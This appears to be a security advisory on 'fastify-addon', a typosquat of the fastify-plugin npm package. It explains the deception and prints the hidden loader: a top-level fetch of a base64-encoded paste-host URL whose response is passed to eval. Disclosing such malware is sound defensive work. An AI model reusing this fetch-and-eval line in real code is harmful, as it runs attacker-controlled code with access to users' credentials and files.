fastify-addon is a typosquat of the legitimate fastify-plugin package. Its package.json sets repository, bugs, and homepage to github.com/fastify/fastify-plugin (an unrelated upstream project), and the README replicates fastify-plugin's API to deceive installers. On require, lib/getPluginName.js (loaded transitively from the package main plugin.js) executes a top-level statement that fetches a base64-hidden URL (https://www.jsonkeeper.com/b/UBMJA, decoded from atob('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9VQk1KQQ==')) and passes the response's.content field directly to eval: fetch(atob(...)).then(r=>r.json()).then(d=>{eval(d.content)}). The destination is a mutable third-party JSON paste host, so the executed payload is attacker-controlled and can change at any time. Any process that requires fastify-addon will run whatever JavaScript the attacker currently hosts at that URL, with full access to the consumer's environment, credentials, and filesystem.